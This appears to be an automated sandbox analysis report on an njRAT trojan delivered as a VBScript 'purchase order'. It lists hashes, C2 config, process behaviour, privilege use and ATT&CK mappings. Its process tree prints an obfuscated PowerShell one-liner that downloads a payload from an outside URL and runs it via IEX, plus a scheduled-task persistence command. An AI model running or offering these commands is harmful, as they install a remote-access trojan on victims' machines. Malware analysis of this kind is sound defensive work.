njrat | 4ec13434944f4989f27c29121d433ada8363059c6e20a3828792a06c4171a60b

General

Target

PO#_45662.vbs
Size

15KB
MD5

90161e1c823ccc2e151d0828a801d035
SHA1

3e7ca03445260eb094f4d3a5506ff953d7405d8c
SHA256

4ec13434944f4989f27c29121d433ada8363059c6e20a3828792a06c4171a60b
SHA512

cec2bacfdb81dd93a7a8f4a41444cca5be2439fff5575deff9700a09fac01b40b2394fbc995f2d1987c61668851c919586514f124a3fd396c076cab0c69fe62f

Score

10^/10

njrat ------(send)------trojan

Malware Config

Extracted

Family

njrat

Version

v2.0

Botnet

------(Send)------

C2

new.libya2020.com.ly:2020

Mutex

Windows

Attributes

reg_key
Windows
splitter
|-F-|

Signatures

njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat
Blocklisted process makes network request 4 IoCs

Processes:

powershell.exe

flow pid process

9 3988 powershell.exe
11 3988 powershell.exe
12 3988 powershell.exe
21 3988 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 2 IoCs

Processes:

klCWkF0mORiIYz2.exeklCWkF0mORiIYz2.exe

pid process

1512 klCWkF0mORiIYz2.exe
2668 klCWkF0mORiIYz2.exe
Drops startup file 1 IoCs

Processes:

klCWkF0mORiIYz2.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk klCWkF0mORiIYz2.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

klCWkF0mORiIYz2.exe

description pid process target process

PID 1512 set thread context of 2668 1512 klCWkF0mORiIYz2.exe klCWkF0mORiIYz2.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

2528 schtasks.exe
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exe

pid process

3988 powershell.exe
3988 powershell.exe
3988 powershell.exe

flow	pid	process
9	3988	powershell.exe
11	3988	powershell.exe
12	3988	powershell.exe
21	3988	powershell.exe

pid	process
1512	klCWkF0mORiIYz2.exe
2668	klCWkF0mORiIYz2.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk	klCWkF0mORiIYz2.exe

description	pid	process	target process
PID 1512 set thread context of 2668	1512	klCWkF0mORiIYz2.exe	klCWkF0mORiIYz2.exe

pid	process
2528	schtasks.exe

pid	process
3988	powershell.exe
3988	powershell.exe
3988	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exe

description	pid	process
Token: SeDebugPrivilege	3988	powershell.exe
Token: SeIncreaseQuotaPrivilege	3988	powershell.exe
Token: SeSecurityPrivilege	3988	powershell.exe
Token: SeTakeOwnershipPrivilege	3988	powershell.exe
Token: SeLoadDriverPrivilege	3988	powershell.exe
Token: SeSystemProfilePrivilege	3988	powershell.exe
Token: SeSystemtimePrivilege	3988	powershell.exe
Token: SeProfSingleProcessPrivilege	3988	powershell.exe
Token: SeIncBasePriorityPrivilege	3988	powershell.exe
Token: SeCreatePagefilePrivilege	3988	powershell.exe
Token: SeBackupPrivilege	3988	powershell.exe
Token: SeRestorePrivilege	3988	powershell.exe
Token: SeShutdownPrivilege	3988	powershell.exe
Token: SeDebugPrivilege	3988	powershell.exe
Token: SeSystemEnvironmentPrivilege	3988	powershell.exe
Token: SeRemoteShutdownPrivilege	3988	powershell.exe
Token: SeUndockPrivilege	3988	powershell.exe
Token: SeManageVolumePrivilege	3988	powershell.exe
Token: 33	3988	powershell.exe
Token: 34	3988	powershell.exe
Token: 35	3988	powershell.exe
Token: 36	3988	powershell.exe
Token: SeIncreaseQuotaPrivilege	3988	powershell.exe
Token: SeSecurityPrivilege	3988	powershell.exe
Token: SeTakeOwnershipPrivilege	3988	powershell.exe
Token: SeLoadDriverPrivilege	3988	powershell.exe
Token: SeSystemProfilePrivilege	3988	powershell.exe
Token: SeSystemtimePrivilege	3988	powershell.exe
Token: SeProfSingleProcessPrivilege	3988	powershell.exe
Token: SeIncBasePriorityPrivilege	3988	powershell.exe
Token: SeCreatePagefilePrivilege	3988	powershell.exe
Token: SeBackupPrivilege	3988	powershell.exe
Token: SeRestorePrivilege	3988	powershell.exe
Token: SeShutdownPrivilege	3988	powershell.exe
Token: SeDebugPrivilege	3988	powershell.exe
Token: SeSystemEnvironmentPrivilege	3988	powershell.exe
Token: SeRemoteShutdownPrivilege	3988	powershell.exe
Token: SeUndockPrivilege	3988	powershell.exe
Token: SeManageVolumePrivilege	3988	powershell.exe
Token: 33	3988	powershell.exe
Token: 34	3988	powershell.exe
Token: 35	3988	powershell.exe
Token: 36	3988	powershell.exe
Token: SeIncreaseQuotaPrivilege	3988	powershell.exe
Token: SeSecurityPrivilege	3988	powershell.exe
Token: SeTakeOwnershipPrivilege	3988	powershell.exe
Token: SeLoadDriverPrivilege	3988	powershell.exe
Token: SeSystemProfilePrivilege	3988	powershell.exe
Token: SeSystemtimePrivilege	3988	powershell.exe
Token: SeProfSingleProcessPrivilege	3988	powershell.exe
Token: SeIncBasePriorityPrivilege	3988	powershell.exe
Token: SeCreatePagefilePrivilege	3988	powershell.exe
Token: SeBackupPrivilege	3988	powershell.exe
Token: SeRestorePrivilege	3988	powershell.exe
Token: SeShutdownPrivilege	3988	powershell.exe
Token: SeDebugPrivilege	3988	powershell.exe
Token: SeSystemEnvironmentPrivilege	3988	powershell.exe
Token: SeRemoteShutdownPrivilege	3988	powershell.exe
Token: SeUndockPrivilege	3988	powershell.exe
Token: SeManageVolumePrivilege	3988	powershell.exe
Token: 33	3988	powershell.exe
Token: 34	3988	powershell.exe
Token: 35	3988	powershell.exe
Token: 36	3988	powershell.exe

Suspicious use of WriteProcessMemory 16 IoCs

Processes:

WScript.exepowershell.exeklCWkF0mORiIYz2.exe

description	pid	process	target process
PID 4324 wrote to memory of 3988	4324	WScript.exe	powershell.exe
PID 4324 wrote to memory of 3988	4324	WScript.exe	powershell.exe
PID 3988 wrote to memory of 1512	3988	powershell.exe	klCWkF0mORiIYz2.exe
PID 3988 wrote to memory of 1512	3988	powershell.exe	klCWkF0mORiIYz2.exe
PID 3988 wrote to memory of 1512	3988	powershell.exe	klCWkF0mORiIYz2.exe
PID 1512 wrote to memory of 2528	1512	klCWkF0mORiIYz2.exe	schtasks.exe
PID 1512 wrote to memory of 2528	1512	klCWkF0mORiIYz2.exe	schtasks.exe
PID 1512 wrote to memory of 2528	1512	klCWkF0mORiIYz2.exe	schtasks.exe
PID 1512 wrote to memory of 2668	1512	klCWkF0mORiIYz2.exe	klCWkF0mORiIYz2.exe
PID 1512 wrote to memory of 2668	1512	klCWkF0mORiIYz2.exe	klCWkF0mORiIYz2.exe
PID 1512 wrote to memory of 2668	1512	klCWkF0mORiIYz2.exe	klCWkF0mORiIYz2.exe
PID 1512 wrote to memory of 2668	1512	klCWkF0mORiIYz2.exe	klCWkF0mORiIYz2.exe
PID 1512 wrote to memory of 2668	1512	klCWkF0mORiIYz2.exe	klCWkF0mORiIYz2.exe
PID 1512 wrote to memory of 2668	1512	klCWkF0mORiIYz2.exe	klCWkF0mORiIYz2.exe
PID 1512 wrote to memory of 2668	1512	klCWkF0mORiIYz2.exe	klCWkF0mORiIYz2.exe
PID 1512 wrote to memory of 2668	1512	klCWkF0mORiIYz2.exe	klCWkF0mORiIYz2.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\PO#_45662.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:4324

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $NOTHING = '(N`e`uprWjOFkvkmXBfdt`.W`e'.Replace('uprWjOFkvkmXBfd','w-Object Ne');$alosh='bCxNDFdlAckIUgChpnlo'.Replace('xNDFdlAckIUgChp','lient).Dow'); $Dont='adString(''https://lacombaphotography.com/update/0/UP.jpg'')';$YOUTUBE=I`E`X ($NOTHING,$alosh,$Dont -Join '')|I`E`X
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3988

C:\Users\Public\klCWkF0mORiIYz2.exe
"C:\Users\Public\klCWkF0mORiIYz2.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1512

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dRjlsmRl" /XML "C:\Users\Admin\AppData\Local\Temp\tmpBA63.tmp"
4⤵
- Creates scheduled task(s)
PID:2528

C:\Users\Public\klCWkF0mORiIYz2.exe
"C:\Users\Public\klCWkF0mORiIYz2.exe"
4⤵
- Executes dropped EXE
- Drops startup file
PID:2668

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\klCWkF0mORiIYz2.exe.log
MD5
0c2899d7c6746f42d5bbe088c777f94c

SHA1
622f66c5f7a3c91b28a9f43ce7c6cabadbf514f1

SHA256
5b0b99740cadaeff7b9891136644b396941547e20cc7eea646560d0dad5a5458

SHA512
ab7a3409ed4b6ca00358330a3aa4ef6de7d81eb21a5e24bb629ef6a7c7c4e2a70ca3accfbc989ed6e495fdb8eb6203a26d6f2a37b2a5809af4276af375b49078

Download Submit
C:\Users\Public\klCWkF0mORiIYz2.exe
MD5
834e38185fb19b1adf58cc82aaf73e1e

SHA1
2a3bca9b936093f82a1be92737012e683a863a6a

SHA256
8a2e1a0ade05db6ef7fdc307b058119e7d84c26b7a75495a4348e310d67f15e7

SHA512
4fe755a20fcbf6ac5c1f4993489a9c00306908f4497d11d1d260aad6bf26dbb7cd7b86e14d0d15f2546267df8cd19b2765405a1ee446d8bd316aa11201f1e7c9

Download Submit
C:\Users\Public\klCWkF0mORiIYz2.exe
MD5
834e38185fb19b1adf58cc82aaf73e1e

SHA1
2a3bca9b936093f82a1be92737012e683a863a6a

SHA256
8a2e1a0ade05db6ef7fdc307b058119e7d84c26b7a75495a4348e310d67f15e7

SHA512
4fe755a20fcbf6ac5c1f4993489a9c00306908f4497d11d1d260aad6bf26dbb7cd7b86e14d0d15f2546267df8cd19b2765405a1ee446d8bd316aa11201f1e7c9

Download Submit
C:\Users\Public\klCWkF0mORiIYz2.exe
MD5
834e38185fb19b1adf58cc82aaf73e1e

SHA1
2a3bca9b936093f82a1be92737012e683a863a6a

SHA256
8a2e1a0ade05db6ef7fdc307b058119e7d84c26b7a75495a4348e310d67f15e7

SHA512
4fe755a20fcbf6ac5c1f4993489a9c00306908f4497d11d1d260aad6bf26dbb7cd7b86e14d0d15f2546267df8cd19b2765405a1ee446d8bd316aa11201f1e7c9

Download Submit
memory/1512-166-0x00000000056C0000-0x00000000056C1000-memory.dmp

Filesize
4KB

Download
memory/1512-171-0x00000000092D0000-0x00000000092F9000-memory.dmp

Filesize
164KB

Download
memory/1512-170-0x0000000009330000-0x0000000009331000-memory.dmp

Filesize
4KB

Download
memory/1512-169-0x0000000009000000-0x0000000009007000-memory.dmp

Filesize
28KB

Download
memory/1512-168-0x00000000056C0000-0x0000000005BBE000-memory.dmp

Filesize
5.0MB

Download
memory/1512-167-0x0000000005790000-0x0000000005791000-memory.dmp

Filesize
4KB

Download
memory/1512-159-0x0000000000000000-mapping.dmp

Download
memory/1512-165-0x0000000005BC0000-0x0000000005BC1000-memory.dmp

Filesize
4KB

Download
memory/1512-163-0x0000000000C30000-0x0000000000C31000-memory.dmp

Filesize
4KB

Download
memory/2528-172-0x0000000000000000-mapping.dmp

Download
memory/2668-173-0x0000000000400000-0x000000000040E000-memory.dmp

Filesize
56KB

Download
memory/2668-174-0x000000000040839E-mapping.dmp

Download
memory/2668-181-0x0000000005660000-0x0000000005661000-memory.dmp

Filesize
4KB

Download
memory/3988-123-0x000001D263450000-0x000001D263451000-memory.dmp

Filesize
4KB

Download
memory/3988-124-0x000001D2619B0000-0x000001D2619B2000-memory.dmp

Filesize
8KB

Download
memory/3988-161-0x000001D2619B0000-0x000001D2619B2000-memory.dmp

Filesize
8KB

Download
memory/3988-133-0x000001D27B9D6000-0x000001D27B9D8000-memory.dmp

Filesize
8KB

Download
memory/3988-129-0x000001D2619B0000-0x000001D2619B2000-memory.dmp

Filesize
8KB

Download
memory/3988-128-0x000001D27DAB0000-0x000001D27DAB1000-memory.dmp

Filesize
4KB

Download
memory/3988-127-0x000001D2619B0000-0x000001D2619B2000-memory.dmp

Filesize
8KB

Download
memory/3988-126-0x000001D2619B0000-0x000001D2619B2000-memory.dmp

Filesize
8KB

Download
memory/3988-125-0x000001D2619B0000-0x000001D2619B2000-memory.dmp

Filesize
8KB

Download
memory/3988-150-0x000001D27B9D8000-0x000001D27B9DA000-memory.dmp

Filesize
8KB

Download
memory/3988-115-0x0000000000000000-mapping.dmp

Download
memory/3988-122-0x000001D2619B0000-0x000001D2619B2000-memory.dmp

Filesize
8KB

Download
memory/3988-121-0x000001D27B9D3000-0x000001D27B9D5000-memory.dmp

Filesize
8KB

Download
memory/3988-119-0x000001D2619B0000-0x000001D2619B2000-memory.dmp

Filesize
8KB

Download
memory/3988-120-0x000001D27B9D0000-0x000001D27B9D2000-memory.dmp

Filesize
8KB

Download
memory/3988-118-0x000001D2619B0000-0x000001D2619B2000-memory.dmp

Filesize
8KB

Download
memory/3988-116-0x000001D2619B0000-0x000001D2619B2000-memory.dmp

Filesize
8KB

Download
memory/3988-117-0x000001D2619B0000-0x000001D2619B2000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads